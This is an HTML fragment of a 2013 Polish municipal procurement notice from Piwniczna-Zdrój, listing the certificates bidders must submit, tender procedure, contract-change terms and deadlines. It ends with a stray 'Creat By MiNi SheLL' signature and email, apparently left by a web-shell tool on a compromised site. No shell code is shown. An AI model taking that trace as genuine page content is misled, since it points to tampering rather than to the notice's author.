</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych
A.4) Oświadczenie dotyczące grupy kapitałowej z art. 26 ust. 2d Prawa zamówień publicznych  
A.5)Wzór umowy 
A.6) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. 
A.7) Inne dokumenty zgodne z SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie               w formie aneksu podpisanego przez obie strony, pod rygorem nieważności zgodnie z art. 144 ustawy Prawo Zamówień Publicznych.
2.	W związku z brzmieniem art. 144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia i w następstwie okoliczności, których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych i materiałowych, a także zmiany przepisów prawa,
2)	w zakresie terminu realizacji umowy (wykonania usług), zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca, w tym jeżeli pojawiły się okoliczności, których nie można było przewidzieć w chwili zawierania umowy,
3)	w zakresie zmniejszenia zakresu usług w sytuacji podjęcia przez Zamawiającego decyzji o ograniczeniu zakresu przedmiotu umowy określonego w § 1,
4)	w zakresie zmniejszenie wynagrodzenia, zwłaszcza w sytuacji opisanej w pkt 3,
5)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki podatku VAT w zakresie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.pl Baner BIP link Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul. Rynek 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul. Rynek 20
Pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.08.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com